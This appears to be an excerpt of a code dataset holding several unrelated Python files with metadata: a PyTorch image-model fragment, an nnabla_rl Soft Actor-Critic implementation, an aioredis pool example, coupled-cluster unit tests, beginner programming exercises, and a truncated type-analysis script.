self.opt.use_feature_extractor:\n self.loss_G = self.loss_G_L2 / 1000\n else:\n fake_B_output = self.netFeature(self.fake_B)\n real_B_output = self.netFeature(self.real_B)\n feat_loss = self.criterionL2(fake_B_output, real_B_output)\n self.loss_G = self.loss_G_L2 / 1000 + feat_loss / feat_loss.item() * self.loss_G_L2.item() / 1000\n self.loss_G.backward()\n\n def optimize_parameters(self):\n self.forward()\n if self.opt.use_feature_extractor:\n self.set_requires_grad(self.netFeature, True)\n self.optimizer_Feature.zero_grad()\n self.backward_D()\n if self.opt.use_feature_extractor:\n self.optimizer_Feature.step()\n self.set_requires_grad(self.netFeature, False)\n # update G\n self.optimizer_G.zero_grad()\n self.backward_G()\n self.optimizer_G.step()\n\n def compute_visuals(self, dataset=None):\n if not self.opt.fixed_example or dataset is None:\n return\n single = dataset.dataset.get_val_item(self.opt.fixed_index)\n AtoB = self.opt.direction == 'AtoB'\n self.real_A = single['A' if AtoB else 'B'].unsqueeze(0).to(self.device)\n self.real_B = single['B' if AtoB else 'A'].unsqueeze(0).to(self.device)\n self.image_paths = [single['A_paths' if AtoB else 'B_paths']]\n\n self.forward()\n if self.opt.break4:\n self.real_A = self.combine_from_4(self.real_A)\n self.real_B = self.combine_from_4(self.real_B)\n self.post_unet = self.combine_from_4(self.post_unet)\n self.fake_B = self.combine_from_4(self.fake_B)\n\n def __patch_instance_norm_state_dict(self, state_dict, module, keys, i=0):\n \"\"\"Fix InstanceNorm checkpoints incompatibility (prior to 0.4)\"\"\"\n key = keys[i]\n if i + 1 == len(keys): # at the end, pointing to a parameter/buffer\n if module.__class__.__name__.startswith('InstanceNorm') and \\\n (key == 'running_mean' or key == 'running_var'):\n if getattr(module, key) is None:\n state_dict.pop('.'.join(keys))\n if module.__class__.__name__.startswith('InstanceNorm') and \\\n (key == 'num_batches_tracked'):\n state_dict.pop('.'.join(keys))\n else:\n self.__patch_instance_norm_state_dict(state_dict, getattr(module, key), keys, i + 1)\n\n def load_base_networks(self):\n for name in self.preload_names:\n if isinstance(name, str):\n load_filename = 'base_net_%s.pth' % (name)\n load_path = os.path.join(self.save_dir, load_filename)\n net = getattr(self, 'net' + name)\n if isinstance(net, torch.nn.DataParallel):\n net = net.module\n print('loading the model from %s' % load_path)\n # if you are using PyTorch newer than 0.4 (e.g., built from\n # GitHub source), you can remove str() on self.device\n state_dict = torch.load(load_path, map_location=str(self.device))\n if hasattr(state_dict, '_metadata'):\n del state_dict._metadata\n\n # patch InstanceNorm checkpoints prior to 0.4\n for key in list(state_dict.keys()): # need to copy keys here because we mutate in loop\n self.__patch_instance_norm_state_dict(state_dict, net, key.split('.'))\n net.load_state_dict(state_dict)\n\n def break_into_4(self, image):\n return torch.cat(torch.chunk(torch.cat(torch.chunk(image, 2, dim=2), 0), 2, dim=3), 0)\n\n def combine_from_4(self, image):\n return torch.cat(torch.chunk(torch.cat(torch.chunk(image, 2, dim=0), 3), 2, dim=0), 2)\n","sub_path":"models/unet_resnet_L2_model.py","file_name":"unet_resnet_L2_model.py","file_ext":"py","file_size_in_byte":8824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"153482719","text":"# Copyright 2020,2021 Sony Corporation.\n# Copyright 2021 Sony Group Corporation.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom dataclasses import dataclass\nfrom typing import Any, Dict, List, Optional, Union, cast\n\nimport gym\nimport numpy as np\n\nimport nnabla as nn\nimport nnabla.solvers as NS\nimport nnabla_rl.environment_explorers as EE\nimport nnabla_rl.model_trainers as MT\nfrom nnabla_rl.algorithm import Algorithm, AlgorithmConfig, eval_api\nfrom nnabla_rl.builders import ModelBuilder, ReplayBufferBuilder, SolverBuilder\nfrom nnabla_rl.environment_explorer import EnvironmentExplorer\nfrom nnabla_rl.environments.environment_info import EnvironmentInfo\nfrom nnabla_rl.model_trainers.model_trainer import ModelTrainer, TrainingBatch\nfrom nnabla_rl.models import QFunction, SACPolicy, SACQFunction, StochasticPolicy\nfrom nnabla_rl.replay_buffer import ReplayBuffer\nfrom nnabla_rl.utils import context\nfrom nnabla_rl.utils.data import add_batch_dimension, marshal_experiences, set_data_to_variable\nfrom nnabla_rl.utils.misc import create_variable, sync_model\n\n\n@dataclass\nclass SACConfig(AlgorithmConfig):\n '''SACConfig\n List of configurations for SAC algorithm\n\n Args:\n gamma (float): discount factor of rewards. Defaults to 0.99.\n learning_rate (float): learning rate which is set to all solvers. \\\n You can customize/override the learning rate for each solver by implementing the \\\n (:py:class:`SolverBuilder `) by yourself. \\\n Defaults to 0.0003.\n batch_size(int): training batch size. Defaults to 256.\n tau (float): target network's parameter update coefficient. Defaults to 0.005.\n environment_steps (int): Number of steps to interact with the environment on each iteration. Defaults to 1.\n gradient_steps (int): Number of parameter updates to perform on each iteration. Defaults to 1.\n target_entropy (float, optional): Target entropy value. Defaults to None.\n initial_temperature (float, optional): Initial value of temperature parameter. Defaults to None.\n fix_temperature (bool): If true the temperature parameter will not be trained. Defaults to False.\n start_timesteps (int): the timestep when training starts.\\\n The algorithm will collect experiences from the environment by acting randomly until this timestep.\\\n Defaults to 10000.\n replay_buffer_size (int): capacity of the replay buffer. Defaults to 1000000.\n '''\n\n gamma: float = 0.99\n learning_rate: float = 3.0*1e-4\n batch_size: int = 256\n tau: float = 0.005\n environment_steps: int = 1\n gradient_steps: int = 1\n target_entropy: Optional[float] = None\n initial_temperature: Optional[float] = None\n fix_temperature: bool = False\n start_timesteps: int = 10000\n replay_buffer_size: int = 1000000\n\n def __post_init__(self):\n '''__post_init__\n Check set values are in valid range.\n '''\n self._assert_between(self.tau, 0.0, 1.0, 'tau')\n self._assert_between(self.gamma, 0.0, 1.0, 'gamma')\n self._assert_positive(self.gradient_steps, 'gradient_steps')\n self._assert_positive(self.environment_steps, 'environment_steps')\n if self.initial_temperature is not None:\n self._assert_positive(\n self.initial_temperature, 'initial_temperature')\n self._assert_positive(self.start_timesteps, 'start_timesteps')\n\n\nclass DefaultQFunctionBuilder(ModelBuilder[QFunction]):\n def build_model(self, # type: ignore[override]\n scope_name: str,\n env_info: EnvironmentInfo,\n algorithm_config: SACConfig,\n **kwargs) -> QFunction:\n return SACQFunction(scope_name)\n\n\nclass DefaultPolicyBuilder(ModelBuilder[StochasticPolicy]):\n def build_model(self, # type: ignore[override]\n scope_name: str,\n env_info: EnvironmentInfo,\n algorithm_config: SACConfig,\n **kwargs) -> StochasticPolicy:\n return SACPolicy(scope_name, env_info.action_dim)\n\n\nclass DefaultSolverBuilder(SolverBuilder):\n def build_solver(self, # type: ignore[override]\n env_info: EnvironmentInfo,\n algorithm_config: SACConfig,\n **kwargs) -> nn.solver.Solver:\n return NS.Adam(alpha=algorithm_config.learning_rate)\n\n\nclass DefaultReplayBufferBuilder(ReplayBufferBuilder):\n def build_replay_buffer(self, # type: ignore[override]\n env_info: EnvironmentInfo,\n algorithm_config: SACConfig,\n **kwargs) -> ReplayBuffer:\n return ReplayBuffer(capacity=algorithm_config.replay_buffer_size)\n\n\nclass SAC(Algorithm):\n '''Soft Actor-Critic (SAC) algorithm implementation.\n\n This class implements the extended version of Soft Actor Critic (SAC) algorithm\n proposed by T. Haarnoja, et al. in the paper: \"Soft Actor-Critic Algorithms and Applications\"\n For detail see: https://arxiv.org/abs/1812.05905\n\n This algorithm is slightly differs from the implementation of Soft Actor-Critic algorithm presented\n also by T. Haarnoja, et al. in the following paper: https://arxiv.org/abs/1801.01290\n\n The temperature parameter is adjusted automatically instead of providing reward scalar as a\n hyper parameter.\n\n Args:\n env_or_env_info \\\n (gym.Env or :py:class:`EnvironmentInfo `):\n the environment to train or environment info\n config (:py:class:`SACConfig `): configuration of the SAC algorithm\n q_function_builder (:py:class:`ModelBuilder[QFunction] `):\n builder of q function models\n q_solver_builder (:py:class:`SolverBuilder `):\n builder of q function solvers\n policy_builder (:py:class:`ModelBuilder[StochasticPolicy] `):\n builder of actor models\n policy_solver_builder (:py:class:`SolverBuilder `):\n builder of policy solvers\n temperature_solver_builder (:py:class:`SolverBuilder `):\n builder of temperature solvers\n replay_buffer_builder (:py:class:`ReplayBufferBuilder `):\n builder of replay_buffer\n '''\n\n # type declarations to type check with mypy\n # NOTE: declared variables are instance variable and NOT class variable, unless it is marked with ClassVar\n # See https://mypy.readthedocs.io/en/stable/class_basics.html for details\n _config: SACConfig\n _q1: QFunction\n _q2: QFunction\n _train_q_functions: List[QFunction]\n _train_q_solvers: Dict[str, nn.solver.Solver]\n _target_q_functions: List[QFunction]\n\n _pi: StochasticPolicy\n _temperature: MT.policy_trainers.soft_policy_trainer.AdjustableTemperature\n _temperature_solver: Optional[nn.solver.Solver]\n _replay_buffer: ReplayBuffer\n\n _environment_explorer: EnvironmentExplorer\n _policy_trainer: ModelTrainer\n _q_function_trainer: ModelTrainer\n\n _eval_state_var: nn.Variable\n _eval_deterministic_action: nn.Variable\n _eval_probabilistic_action: nn.Variable\n\n _policy_trainer_state: Dict[str, Any]\n _q_function_trainer_state: Dict[str, Any]\n\n def __init__(self, env_or_env_info: Union[gym.Env, EnvironmentInfo],\n config: SACConfig = SACConfig(),\n q_function_builder: ModelBuilder[QFunction] = DefaultQFunctionBuilder(),\n q_solver_builder: SolverBuilder = DefaultSolverBuilder(),\n policy_builder: ModelBuilder[StochasticPolicy] = DefaultPolicyBuilder(),\n policy_solver_builder: SolverBuilder = DefaultSolverBuilder(),\n temperature_solver_builder: SolverBuilder = DefaultSolverBuilder(),\n replay_buffer_builder: ReplayBufferBuilder = DefaultReplayBufferBuilder()):\n super(SAC, self).__init__(env_or_env_info, config=config)\n\n with nn.context_scope(context.get_nnabla_context(self._config.gpu_id)):\n self._q1 = q_function_builder(scope_name=\"q1\", env_info=self._env_info, algorithm_config=self._config)\n self._q2 = q_function_builder(scope_name=\"q2\", env_info=self._env_info, algorithm_config=self._config)\n self._train_q_functions = [self._q1, self._q2]\n self._train_q_solvers = {q.scope_name: q_solver_builder(self._env_info, self._config)\n for q in self._train_q_functions}\n self._target_q_functions = [cast(QFunction, q.deepcopy('target_' + q.scope_name))\n for q in self._train_q_functions]\n\n self._pi = policy_builder(scope_name=\"pi\", env_info=self._env_info, algorithm_config=self._config)\n self._pi_solver = policy_solver_builder(self._env_info, self._config)\n\n self._temperature = MT.policy_trainers.soft_policy_trainer.AdjustableTemperature(\n scope_name='temperature',\n initial_value=self._config.initial_temperature)\n if not self._config.fix_temperature:\n self._temperature_solver = temperature_solver_builder(self._env_info, self._config)\n else:\n self._temperature_solver = None\n\n self._replay_buffer = replay_buffer_builder(self._env_info, self._config)\n\n @eval_api\n def compute_eval_action(self, state):\n with nn.context_scope(context.get_nnabla_context(self._config.gpu_id)):\n action, _ = self._compute_greedy_action(state, deterministic=True)\n return action\n\n def _before_training_start(self, env_or_buffer):\n # set context globally to ensure that the training runs on configured gpu\n context.set_nnabla_context(self._config.gpu_id)\n self._environment_explorer = self._setup_environment_explorer(env_or_buffer)\n self._policy_trainer = self._setup_policy_training(env_or_buffer)\n self._q_function_trainer = self._setup_q_function_training(\n env_or_buffer)\n\n def _setup_environment_explorer(self, env_or_buffer):\n if self._is_buffer(env_or_buffer):\n return None\n explorer_config = EE.RawPolicyExplorerConfig(\n warmup_random_steps=self._config.start_timesteps,\n initial_step_num=self.iteration_num,\n timelimit_as_terminal=False\n )\n explorer = EE.RawPolicyExplorer(policy_action_selector=self._compute_greedy_action,\n env_info=self._env_info,\n config=explorer_config)\n return explorer\n\n def _setup_policy_training(self, env_or_buffer):\n policy_trainer_config = MT.policy_trainers.SoftPolicyTrainerConfig(\n fixed_temperature=self._config.fix_temperature,\n target_entropy=self._config.target_entropy)\n policy_trainer = MT.policy_trainers.SoftPolicyTrainer(\n models=self._pi,\n solvers={self._pi.scope_name: self._pi_solver},\n temperature=self._temperature,\n temperature_solver=self._temperature_solver,\n q_functions=[self._q1, self._q2],\n env_info=self._env_info,\n config=policy_trainer_config)\n return policy_trainer\n\n def _setup_q_function_training(self, env_or_buffer):\n # training input/loss variables\n q_function_trainer_config = MT.q_value_trainers.SoftQTrainerConfig(\n reduction_method='mean',\n grad_clip=None)\n\n q_function_trainer = MT.q_value_trainers.SoftQTrainer(\n train_functions=self._train_q_functions,\n solvers=self._train_q_solvers,\n target_functions=self._target_q_functions,\n target_policy=self._pi,\n temperature=self._policy_trainer.get_temperature(),\n env_info=self._env_info,\n config=q_function_trainer_config)\n for q, target_q in zip(self._train_q_functions, self._target_q_functions):\n sync_model(q, target_q)\n return q_function_trainer\n\n def _run_online_training_iteration(self, env):\n for _ in range(self._config.environment_steps):\n self._run_environment_step(env)\n for _ in range(self._config.gradient_steps):\n self._run_gradient_step(self._replay_buffer)\n\n def _run_offline_training_iteration(self, buffer):\n self._sac_training(buffer)\n\n def _run_environment_step(self, env):\n experiences = self._environment_explorer.step(env)\n self._replay_buffer.append_all(experiences)\n\n def _run_gradient_step(self, replay_buffer):\n if self._config.start_timesteps < self.iteration_num:\n self._sac_training(replay_buffer)\n\n def _sac_training(self, replay_buffer):\n experiences, info = replay_buffer.sample(self._config.batch_size)\n (s, a, r, non_terminal, s_next, *_) = marshal_experiences(experiences)\n batch = TrainingBatch(batch_size=self._config.batch_size,\n s_current=s,\n a_current=a,\n gamma=self._config.gamma,\n reward=r,\n non_terminal=non_terminal,\n s_next=s_next,\n weight=info['weights'])\n\n self._q_function_trainer_state = self._q_function_trainer.train(batch)\n for q, target_q in zip(self._train_q_functions, self._target_q_functions):\n sync_model(q, target_q, tau=self._config.tau)\n self._policy_trainer_state = self._policy_trainer.train(batch)\n\n td_errors = np.abs(self._q_function_trainer_state['td_errors'])\n replay_buffer.update_priorities(td_errors)\n\n @eval_api\n def _compute_greedy_action(self, s, deterministic=False):\n # evaluation input/action variables\n s = add_batch_dimension(s)\n if not hasattr(self, '_eval_state_var'):\n self._eval_state_var = create_variable(1, self._env_info.state_shape)\n distribution = self._pi.pi(self._eval_state_var)\n self._eval_deterministic_action = distribution.choose_probable()\n self._eval_probabilistic_action = distribution.sample()\n set_data_to_variable(self._eval_state_var, s)\n if deterministic:\n self._eval_deterministic_action.forward()\n return np.squeeze(self._eval_deterministic_action.d, axis=0), {}\n else:\n self._eval_probabilistic_action.forward()\n return np.squeeze(self._eval_probabilistic_action.d, axis=0), {}\n\n def _models(self):\n models = [self._q1, self._q2, self._pi, self._temperature]\n return {model.scope_name: model for model in models}\n\n def _solvers(self):\n solvers = {}\n solvers[self._pi.scope_name] = self._pi_solver\n solvers.update(self._train_q_solvers)\n if self._temperature_solver is not None:\n solvers[self._temperature.scope_name] = self._temperature_solver\n return solvers\n\n @classmethod\n def is_supported_env(cls, env_or_env_info):\n env_info = EnvironmentInfo.from_env(env_or_env_info) if isinstance(env_or_env_info, gym.Env) \\\n else env_or_env_info\n return not env_info.is_discrete_action_env()\n\n @property\n def latest_iteration_state(self):\n latest_iteration_state = super(SAC, self).latest_iteration_state\n if hasattr(self, '_policy_trainer_state'):\n latest_iteration_state['scalar'].update({'pi_loss': self._policy_trainer_state['pi_loss']})\n if hasattr(self, '_q_function_trainer_state'):\n latest_iteration_state['scalar'].update({'q_loss': self._q_function_trainer_state['q_loss']})\n latest_iteration_state['histogram'].update(\n {'td_errors': self._q_function_trainer_state['td_errors'].flatten()})\n return latest_iteration_state\n","sub_path":"nnabla_rl/algorithms/sac.py","file_name":"sac.py","file_ext":"py","file_size_in_byte":16743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"517747602","text":"import asyncio\nimport aioredis\n\nloop = asyncio.get_event_loop()\n\n@asyncio.coroutine\ndef go():\n pool = yield from aioredis.create_pool(\n ('localhost', 6379),\n minsize=5, maxsize=10,\n loop=loop)\n with (yield from pool) as redis: # high-level redis API instance\n yield from redis.set('my-key', 'value')\n print((yield from redis.get('my-key')))\n pool.clear() # closing all open connections\n\nloop.run_until_complete(go())\nimport time\ntime.sleep(1)\n","sub_path":"aioredis/connection-pool.py","file_name":"connection-pool.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"197778365","text":"import unittest\nimport numpy\n\nfrom cqcpy import test_utils\nimport cqcpy.spin_utils as spin_utils\nimport cqcpy.cc_energy as cc_energy\nimport cqcpy.cc_equations as cc_equations\n\nclass TamplEquationsTest(unittest.TestCase):\n def setUp(self):\n self.thresh = 1e-12\n self.no = 3\n self.nv = 5\n\n def test_ccsd_stanton(self):\n no = self.no\n nv = self.nv\n T1old,T2old = test_utils.make_random_T(no,nv)\n F,I = test_utils.make_random_integrals(no,nv)\n\n T1sim,T2sim = cc_equations.ccsd_simple(F, I, T1old, T2old)\n T1stn,T2stn = cc_equations.ccsd_stanton(F, I, T1old, T2old)\n\n D1 = numpy.linalg.norm(T1sim - T1stn)\n D2 = numpy.linalg.norm(T2sim - T2stn)\n s1 = D1 < self.thresh\n s2 = D2 < self.thresh\n e1 = \"Error in optimized T1\"\n e2 = \"Error in optimized T2\"\n self.assertTrue(s1,e1)\n self.assertTrue(s2,e2)\n\n def test_ccd(self):\n no = self.no\n nv = self.nv\n T1old,T2old = test_utils.make_random_T(no,nv)\n F,I = test_utils.make_random_integrals(no,nv)\n T1old = numpy.zeros((nv,no))\n\n T2 = cc_equations.ccd_simple(F, I, T2old)\n T1sd,T2sd = cc_equations.ccsd_simple(F, I, T1old, T2old)\n\n D = numpy.linalg.norm(T2 - T2sd)\n s = D < self.thresh\n err = \"Error in CCD T2\"\n self.assertTrue(s,err)\n\n def test_ucc_energy(self):\n noa = self.no\n nob = self.no\n nva = self.nv\n nvb = self.nv\n na = noa + nva\n nb = nob + nvb\n no = noa + nob\n nv = nva + nvb\n Faa = test_utils.make_random_F(noa, nva)\n Fbb = test_utils.make_random_F(nob, nvb)\n\n # Direct integrals over a,b orbitals\n Ia = test_utils.make_random_I_anti(noa,nva)\n Ib = test_utils.make_random_I_anti(nob,nvb)\n Iabab = test_utils.make_random_Ifull_gen(\n noa,nva,nob,nvb,noa,nva,nob,nvb)\n\n # Full antisymmetric spin-orbital tensor\n I = spin_utils.int_to_spin2(Ia, Ib, Iabab, noa, nva, nob, nvb)\n F = spin_utils.F_to_spin(Faa, Fbb, noa, nva, nob, nvb)\n\n # initial T\n T1a,T1b = test_utils.make_random_T1_spatial(noa,nva,nob,nvb)\n T2aa,T2ab,T2bb = test_utils.make_random_T2_spatial(noa,nva,nob,nvb)\n T1 = spin_utils.T1_to_spin(T1a,T1b,noa,nva,nob,nvb)\n T2 = spin_utils.T2_to_spin(T2aa,T2ab,T2bb,noa,nva,nob,nvb)\n\n E_ref = cc_energy.cc_energy(T1,T2,F.ov,I.oovv)\n E_out = cc_energy.ucc_energy((T1a,T1b),(T2aa,T2ab,T2bb),Faa.ov,Fbb.ov,Ia.oovv,Ib.oovv,Iabab.oovv)\n s = abs(E_ref - E_out) < self.thresh\n err = \"Error in ucc_energy\"\n self.assertTrue(s,err)\n\n def test_uccsd(self):\n noa = self.no\n nob = self.no\n nva = self.nv\n nvb = self.nv\n na = noa + nva\n nb = nob + nvb\n no = noa + nob\n nv = nva + nvb\n Faa = test_utils.make_random_F(noa, nva)\n Fbb = test_utils.make_random_F(nob, nvb)\n\n # Direct integrals over a,b orbitals\n Ia = test_utils.make_random_I_anti(noa,nva)\n Ib = test_utils.make_random_I_anti(nob,nvb)\n I_abab = test_utils.make_random_Ifull_gen(\n noa,nva,nob,nvb,noa,nva,nob,nvb)\n\n # Full antisymmetric spin-orbital tensor\n I = spin_utils.int_to_spin2(Ia, Ib, I_abab, noa, nva, nob, nvb)\n F = spin_utils.F_to_spin(Faa, Fbb, noa, nva, nob, nvb)\n\n # initial T\n T1a,T1b = test_utils.make_random_T1_spatial(noa,nva,nob,nvb)\n T2aa,T2ab,T2bb = test_utils.make_random_T2_spatial(noa,nva,nob,nvb)\n T1 = spin_utils.T1_to_spin(T1a,T1b,noa,nva,nob,nvb)\n T2 = spin_utils.T2_to_spin(T2aa,T2ab,T2bb,noa,nva,nob,nvb)\n\n # Update with spin orbitals\n S1ref,S2ref = cc_equations.ccsd_stanton(F, I, T1, T2)\n\n # Update with UCCSD\n S1,S2 = cc_equations.uccsd_stanton(Faa, Fbb, Ia, Ib, I_abab, \n (T1a,T1b), (T2aa,T2ab,T2bb))\n S1a,S1b = S1\n S2aa,S2ab,S2bb = S2\n S1 = spin_utils.T1_to_spin(S1a, S1b, noa, nva, nob, nvb)\n S2 = spin_utils.T2_to_spin(S2aa, S2ab, S2bb, noa, nva, nob, nvb)\n z1 = numpy.linalg.norm(S1 - S1ref) / numpy.sqrt(S1.size)\n z2 = numpy.linalg.norm(S2 - S2ref) / numpy.sqrt(S2.size)\n s1 = z1 < self.thresh\n s2 = z2 < self.thresh\n e1 = \"Error in UCCSD T1\"\n e2 = \"Error in UCCSD T2\"\n self.assertTrue(s1,e1)\n self.assertTrue(s2,e2)\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"cqcpy/tests/test_cc_ampl.py","file_name":"test_cc_ampl.py","file_ext":"py","file_size_in_byte":4519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"529221518","text":"import pandas as pd\n\ndef print_words(string):\n \"\"\"\n Takes a given string, splits in into words and returns them to the screen\n \"\"\"\n words = string.split(' ')\n for word in words:\n print(word)\n\n# print_words('this is my first string')\n\n\ndef count_to(start, end, step=1):\n last_pos = start\n while last_pos <= end:\n print(last_pos)\n last_pos += step\n\n# print(count_to(25,50,5))\n\ndef print_chars(string):\n for char in string:\n print(char)\n\n# print_chars('this is my test string')\n\n\ndef print_vowels(string):\n consonants = ['a','e', 'i', 'o', 'u']\n result = []\n for char in string:\n if char in consonants:\n pass\n else:\n result.append(char)\n print(('').join(result))\n\n# print_vowels('Das is ein Test')\n\n\n\ndef odd_numbers(integers):\n for i in integers:\n if int(i) % 2 > 0:\n print(i)\n\ndef even_numbers(integers):\n for i in integers:\n if int(i) % 2 == 0:\n print(i)\n\ndef divisible_and_multiple(start, end, divisor=4, multiplicator=3):\n pos = start\n while pos <= end:\n if pos % 4 == 0 and pos % 3 == 0 :\n print(pos)\n pos += 1\n\n# divisible_and_multiple(10, 100)\n\n# odd_numbers('123456')\n# even_numbers('1234567')\n\n# print(ord('a'))\n\n\n# print(98- ord('A'))\n\ndef square_of_sum(string):\n result = 0\n for char in string:\n result += int(char)\n return result ** 2\n\n# print(square_of_sum('1239485838'))\n# print(dir('directory'))\n\ndef filter_um(string):\n words = list(string.split(' '))\n return [word for word in words if word != \"um\"]\n\n# print(filter_um('lak um um um sdflkj um alsdkjf l um um '))\n# print(dir(list))\n\n# Matches over all possible \ndef match_lotto(given, match):\n if len(given) != len(match):\n return False\n for number in given:\n if number not in list(match):\n return False\n return True\n\n# print(match_lotto('12346', '23451'))\n\ndef selectively_append(string, length=5):\n return [word for word in string.split(' ') if len(word) > 5]\n\n# print(selectively_append('lakjsdlfkj asdlf lkjkkkkk lkj lkj l lkj lkjlkj lkj lkj', 6))\n\n\ndef list_overlap(listA, listB):\n a = set(listA)\n b = set(listB)\n\n if len(a) > len(b):\n return [word for word in a if word in b]\n else:\n return [word for word in b if word in a]\n\n# b = [1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89]\n# a = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]\n# print(list_overlap(a,b))\n\n\n\ndef is_palindrome(string):\n \n string = string.lower()\n for i in range(len(string)):\n print(string[i], string[-i-1])\n if string[i] != string[-i-1]:\n return False\n return True\n\n# print(is_palindrome('Anna'))\n\ndef keep_even(numbers):\n return [number for number in numbers if number % 2 == 0]\n# print(keep_even([1,2,3,4,5]))\n\n\n# Rock Paper Scissors\nimport random\ndef rock_paper_scissors(rounds=3):\n wins = []\n actions = ['Rock', 'Paper', 'Scissors']\n while True:\n print('Round:', len(wins)+ 1)\n print('Whats your choice')\n player = input(\"-->\")\n computer = actions[random.randint(0,2)]\n print('Computer chooses:', computer)\n \n # Generate a random gameplay\n if player == computer:\n pass\n elif player == 'Rock' and computer =='Scissors':\n wins.append(0)\n elif player == \"Scissors\" and computer == \"Paper\":\n wins.append(0)\n elif player == \"Paper\" and computer == \"Rock\":\n wins.append(0)\n else:\n wins.append(1)\n\n # Check if somebody already won\n if wins.count(0) == 3:\n print('Congratulations! You beat it!!')\n break\n elif wins.count(1) == 3:\n print('DAAAHHH! You sucked!')\n break\n\n print('You:', wins.count(0), 'Computer:', wins.count(1))\n\n# rock_paper_scissors()\n\ndef guessing_game(rng=9):\n goal = random.randint(1,rng)\n count = 0\n while True:\n count += 1\n print('Take a guess')\n guess = int(input('-->'))\n if guess == goal:\n print('You got it!! It took you only', count, 'tries...')\n break\n elif guess < goal:\n print('Guess higher')\n else:\n print('Guess lower')\n\n\n# guessing_game(1000)\n\n\ndef generate_password(length=5):\n s = \"abcdefghijklmnopqrstuvwxyz01234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()?\"\n return \"\".join(random.sample(s, length))\n\nprint(generate_password(16))\n# for i in range(49, 123):\n# print(chr(i))\n","sub_path":"DDD_Python/AAA_ProgrammingExercises/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":4562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"389940625","text":"import re\nimport argparse\nimport type_analysis\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"programs\", help=\"The file(s) for which types will be detected\", nargs=\"*\", type=argparse.FileType('r'))\n\n#NOTE: Later, I must account for what happens if more parameters are present in the header than the contract, and vise versa\n\nfunc_regex = \"(def .*?\\(.*?\\):)\"\n\nclass Signature(object):\n\t#string,string -> None\n\tdef __init__(self, contract, header):\n\t\tself.name = self.__get_name(header)\n\t\tself.param_names = self.__get_param_names(header)\n\t\tself.params = dict.fromkeys(self.param_names)\n\t\tself.returns = []\n\t\tif contract is not None:\n\t\t\tparam_types,return_types = self.__get_contract_types(contract)\n\t\t\tfor param_name,param_type in zip(self.param_names,param_types):\n\t\t\t\tself.params[param_name] = param_type\n\t\t\tself.returns = return_types\n\t\n\tdef __setitem__(self, key, value):\n\t\tif key==\"return\":\n\t\t\tself.returns = value\n\n\t#string -> string\n\tdef __getitem__(self, key):\n\t\tif key==\"return\":\n\t\t\treturn self.returns\n\t\telse:\n\t\t\treturn self.params[key]\n\t\n\t#string -> list[string]\n\tdef __get_param_names(self, header):\n\t\tparam_list = header[header.find('(')+1:header.find(')')]\n\t\treturn [param.strip() for param in param_list.split(',')]\n\n\t#string -> list[string]\n\tdef __get_contract_types(self, contract):\n\t\tif contract is None:\n\t\t\treturn None,None\n\t\tparam_contract,return_contract = [piece.strip() for piece in contract.split(\"->\")]\n\t\tparam_types = [param.strip() for param in param_contract.split(',')]\n\t\treturn_types = [ret.strip() for ret in return_contract.split(',')]\n\t\treturn param_types,return_types\n\n\t#string -> string\n\tdef __get_name(self, header):\n\t\treturn header[:header.find('(')].strip()\n\n\t#None -> string\n\tdef __str__(self):\n\t\tcontract = \"\"\n\t\tfor param in self.param_names:\n\t\t\tcontract += \"{0},\".format(self.params[param])\n\t\tif contract.endswith(','):\n\t\t\tcontract = contract[:-1].strip()\n\t\t\n\t\tcontract += \" -> \"\n\n\t\tfor return_type in self.returns:\n\t\t\tcontract += \"{0},\".format(return_type)\n\t\tif contract.endswith(','):\n\t\t\tcontract = contract[:-1].strip()\n\t\t\n\t\treturn contract\n\nclass Function(object):\n\t#list[string] -> None\n\tdef __init__(self, func):\n\t\tself.contract,func = Function.get_contract(func)\n\t\tself.header,func = Function.get_header(func)\n\t\tself.body = func\n\n\t\tself.signature = Signature(self.contract,self.header)\n\t\tself.name = self.signature.name\n\n\t#None -> string\n\tdef __str__(self):\n\t\tstring = \"#{0}\\ndef {1}:\\n\".format(self.signature,self.header)\n\t\tfor line in self.body:\n\t\t\tstring += \"{0}\\n\".format(line)\n\t\treturn string\n\t\n\t#string -> string,string\n\t#NOTE: Later, also parse from function docstring\n\t@staticmethod\n\tdef get_contract(func):\n\t\tif func[0].startswith(\"#\"):\n\t\t\treturn func[0][1:],func[1:]\n\t\telse:\n\t\t\treturn None,func\n\n\t#string -> string,string\n\t@staticmethod\n\tdef get_header(func):\n\t\theader = func[0]\n\t\theader = header[4:header.find(':')].strip()\n\t\treturn header,func[1:]\n\t\n\t#string -> bool\n\t@staticmethod\n\tdef has_next(program_text):\n\t\treturn re.search(func_regex,program_text) is not None\n\n\t#string -> string,string,string,string\n\t@staticmethod\n\tdef next_func(program_text):\n\t\tif not Function.has_next(program_text):\n\t\t\traise StopIteration(\"All functions have ben extracted from this file.\")\n\n\t\tpieces = re.split(func_regex,program_text)\n\t\tbefore = pieces[0]\n\t\tfunc,after = Function.__find_func(pieces[1],pieces[2].splitlines()[1:]) #NOTE: I ignore the first element of splitlines because it always seems to be empty. I DO NOT KNOW IF THIS IS THE CASE\n\t\tcontract = before.splitlines()[-1]\n\t\tif contract.startswith(\"#\") and \"->\" in contract:\n\t\t\tbefore = before[:before.find(contract)]\n\t\t\tfunc = \"{0}\\n{1}\".format(contract,func)\n\t\tend_pos = len(before) + len(func) + len(after)\n\t\tprogram_text = program_text[end_pos+1:]\n\t\treturn 